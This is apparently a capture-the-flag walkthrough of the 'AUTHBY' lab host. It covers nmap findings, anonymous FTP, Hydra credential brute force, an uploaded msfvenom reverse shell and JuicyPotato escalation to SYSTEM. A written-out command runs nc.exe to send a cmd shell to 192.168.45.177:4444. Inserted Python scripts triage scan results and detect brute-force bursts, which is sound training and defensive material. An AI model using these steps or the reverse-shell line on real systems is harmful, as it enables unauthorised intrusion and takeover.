AUTHBY

1-Nmap

PORT     STATE SERVICE            VERSION
21/tcp   open  ftp                zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| total 9680
| ----------   1 root     root      5610496 Oct 18  2011 zFTPServer.exe
| ----------   1 root     root           25 Feb 10  2011 UninstallService.bat
| ----------   1 root     root      4284928 Oct 18  2011 Uninstall.exe
| ----------   1 root     root           17 Aug 13  2011 StopService.bat
| ----------   1 root     root           18 Aug 13  2011 StartService.bat
| ----------   1 root     root         8736 Nov 09  2011 Settings.ini
| dr-xr-xr-x   1 root     root          512 Aug 20 23:56 log
| ----------   1 root     root         2275 Aug 08  2011 LICENSE.htm
| ----------   1 root     root           23 Feb 10  2011 InstallService.bat
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 extensions
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 certificates
|_dr-xr-xr-x   1 root     root          512 Mar 31 06:42 accounts
242/tcp  open  http       Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
| http-auth:
| HTTP/1.1 401 Authorization Required\x0D
|_  Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
|_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
|_http-title: 401 Authorization Required
| http-method-tamper:
|   VULNERABLE:
|   Authentication bypass by HTTP verb tampering
|     State: VULNERABLE (Exploitable)
|       This web server contains password protected resources vulnerable to authentication bypass
|       vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
|        common HTTP methods and in misconfigured .htaccess files.
|
|     Extra information:
|
|   URIs suspected to be vulnerable to HTTP verb tampering:
|     / [GENERIC]
|
|     References:
|       http://www.mkit.com.ar/labs/htexploit/
|       https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29
|       http://www.imperva.com/resources/glossary/http_verb_tampering.html
|_      http://capec.mitre.org/data/definitions/274.html
3145/tcp open  zftp-admin zFTPServer admin
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info:
|   Target_Name: LIVDA
|   NetBIOS_Domain_Name: LIVDA
|   NetBIOS_Computer_Name: LIVDA
|   DNS_Domain_Name: LIVDA
|   DNS_Computer_Name: LIVDA
|   Product_Version: 6.0.6001
|_  System_Time: 2021-08-20T16:56:51+00:00
| ssl-cert: Subject: commonName=LIVDA
| Not valid before: 2021-03-09T19:01:52
|_Not valid after:  2021-09-08T19:01:52
|_ssl-date: 2021-08-20T16:56:56+00:00; 0s from scanner time.
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
|     Disclosure date: 2012-03-13
|     References:
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
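Three of the findings above are the ones a defender has to act on: anonymous FTP on 21, the HTTP verb-tampering result on 242 and MS12-020 on 3389. The following script is an added example (not part of the original walkthrough) that parses nmap's normal text output into per-port findings and pulls out exactly those items; the embedded scan text is a constructed excerpt modelled on the listing above, and the layout it relies on (an NSE vuln title line immediately followed by its "State: VULNERABLE" line) is the format the vulns library prints.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt modelled on the scan output above; assumed to be nmap's
# normal (-oN) text format, which is what the walkthrough shows.
SAMPLE_NMAP = """\
PORT     STATE SERVICE            VERSION
21/tcp   open  ftp                zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ----------   1 root     root         8736 Nov 09  2011 Settings.ini
|_dr-xr-xr-x   1 root     root          512 Mar 31 06:42 accounts
242/tcp  open  http       Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
| http-method-tamper:
|   VULNERABLE:
|   Authentication bypass by HTTP verb tampering
|     State: VULNERABLE (Exploitable)
|   URIs suspected to be vulnerable to HTTP verb tampering:
|_    / [GENERIC]
3145/tcp open  zftp-admin zFTPServer admin
3389/tcp open  ssl/ms-wbt-server?
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|_    Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")   # "21/tcp open ftp version"
SCRIPT_RE = re.compile(r"^\|_?\s*(.*)$")                             # NSE script output lines
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


@dataclass
class PortFinding:
    port: int
    proto: str
    state: str
    service: str
    version: str
    script_lines: list = field(default_factory=list)

    def vulnerable_titles(self):
        """Titles of NSE vuln findings: the vulns library prints the title line
        immediately before its 'State: VULNERABLE' line."""
        return [self.script_lines[i - 1]
                for i, line in enumerate(self.script_lines)
                if i > 0 and line.startswith("State: VULNERABLE")]

    def cves(self):
        return sorted({c for line in self.script_lines for c in CVE_RE.findall(line)})

    def anonymous_ftp(self):
        return any("Anonymous FTP login allowed" in line for line in self.script_lines)


def parse_nmap(text):
    """Return {port: PortFinding} for every port line in nmap -oN output."""
    findings, current = {}, None
    for raw in text.splitlines():
        m = PORT_RE.match(raw)
        if m:
            port, proto, state, service, version = m.groups()
            current = PortFinding(int(port), proto, state, service, version.strip())
            findings[current.port] = current
            continue
        s = SCRIPT_RE.match(raw)
        if s and current is not None and s.group(1):
            current.script_lines.append(s.group(1).rstrip())
    return findings


def triage(text):
    """One (port, issue) tuple per finding that needs remediation."""
    issues = []
    for port, f in sorted(parse_nmap(text).items()):
        if f.anonymous_ftp():
            issues.append((port, "anonymous FTP login allowed"))
        for title in f.vulnerable_titles():
            cves = f.cves()
            issues.append((port, title + (f" ({', '.join(cves)})" if cves else "")))
    return issues


if __name__ == "__main__":
    for port, issue in triage(SAMPLE_NMAP):
        print(f"{port:>5}  {issue}")
```

Run on the excerpt it reports the anonymous FTP login, the verb-tampering bypass and MS12-020 with its CVE, which is the short list to hand to whoever owns the host: disable anonymous FTP in zFTPServer, fix the `.htaccess`/`Limit` configuration so every method is covered, and patch or disable RDP.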

2-FTP as anonymous

The scan shows an FTP server that accepts the user Anonymous. Inside it there is a folder called accounts, which contains three users (offsec, anonymous and admin), but we do not have permission to download the files:

FTP connection

3-Hydra

We keep this information for later. There is also a web server on port 242 that requires authentication, so we can use one of the previous users to run a brute-force attack with Hydra and authenticate:

Brute force with Hydra to HTTP auth

The user is offsec with the password elite, so we can now authenticate. Let's see what is inside the web page:

Log in HTTP
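From the server side, a Hydra run against HTTP Basic auth leaves a burst of 401 responses from one source address, optionally followed by a 200 once a password lands. The detector below is an added example (not part of the original walkthrough) that reads Apache combined-format access log lines, counts 401s per source IP in a sliding window, and reports whether a successful login followed the burst. The log lines are constructed sample data; the "Mozilla/4.0 (Hydra)" user agent is assumed to be Hydra's default and is deliberately not used as a signal, since it is trivially changed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache combined log format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)


def _log_line(ip, when, status, user="-", agent="Mozilla/4.0 (Hydra)"):
    """Build a constructed Apache access-log line (sample data, not a real log)."""
    stamp = when.strftime("%d/%b/%Y:%H:%M:%S %z")
    return f'{ip} - {user} [{stamp}] "GET / HTTP/1.1" {status} 381 "-" "{agent}"'


_T0 = datetime(2021, 8, 20, 16, 58, 0, tzinfo=timezone.utc)
SAMPLE_LOG = (
    # 12 failed Basic-auth attempts from one host in 22 seconds, then a success
    [_log_line("10.0.0.5", _T0 + timedelta(seconds=2 * i), 401) for i in range(12)]
    + [_log_line("10.0.0.5", _T0 + timedelta(seconds=25), 200, user="offsec")]
    # a user who mistypes once and then logs in: must not alert
    + [_log_line("10.0.0.9", _T0 + timedelta(seconds=40), 401, agent="Mozilla/5.0"),
       _log_line("10.0.0.9", _T0 + timedelta(seconds=48), 200, user="offsec", agent="Mozilla/5.0")]
)


def parse_line(line):
    """Return (timestamp, ip, status, user) or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return ts, m["ip"], int(m["status"]), m["user"]


def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Flag source IPs with >= threshold 401s inside any sliding window, and
    record whether a 200 followed the first failure (a credential was guessed)."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec[1]].append(rec)
    alerts = []
    for ip, recs in by_ip.items():
        recs.sort()
        fails = [r for r in recs if r[2] == 401]
        start = peak = 0
        for end in range(len(fails)):            # two-pointer sliding window
            while fails[end][0] - fails[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            success = [r[3] for r in recs if r[2] == 200 and r[0] >= fails[0][0]]
            alerts.append({"ip": ip, "failures_in_window": peak,
                           "success_as": success[0] if success else None})
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG):
        print(f"{a['ip']}: {a['failures_in_window']} failures in window, "
              f"then logged in as {a['success_as']}")
```

On the sample the 10.0.0.5 burst is reported with its subsequent login as offsec, while the single mistyped password from 10.0.0.9 stays below the threshold. The 60-second window and threshold of 10 are starting points; a real deployment tunes them to the site's normal failure rate and pairs the alert with rate limiting at the web server.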

It shows the text Qui e nuce nuculeum esse volt, frangit nucem!. Since there is nothing else to do here, we try to brute-force the admin user on FTP; in this case we use the -e parameter to attempt the connection through SSL and, if that fails, try without SSL:

Brute force FTP admin user

4-FTP as admin

We've got the password, let's see what's in the directory:

Log in as admin in FTP

5-Reverse shell

This is the same directory the web page is served from, so uploading a reverse shell lets us gain access to the machine:

Generate a reverse shell with msfvenom

We will then listen on port 4444 to receive the reverse shell:

Listen in 4444 port

Upload it to the web directory:

Upload the reverse shell

Requesting the uploaded file's path on the web server runs it, and we get the shell:

Shell as livda

6-Privilege escalation

Checking our privileges, we see that we have SeImpersonatePrivilege:

User Privileges

Knowing this, we can use JuicyPotato to escalate privileges. Since we are not in an RDP session we cannot spawn another console as NT AUTHORITY\SYSTEM, so we will send a reverse shell instead. We also see that the machine is x86, so we need the compatible build of the tool:

System

We can use one of the BITS CLSIDs listed here: https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterprise.

After downloading it from the link (https://github.com/ivanitlearning/Juicy-Potato-x86/releases) and uploading it via FTP, run the following command:

juicy.potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.exe -e cmd.exe 192.168.45.177 4444" -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9}
JuicyPotato

Listening on port 4444, we receive the privileged shell:

nt authority\system
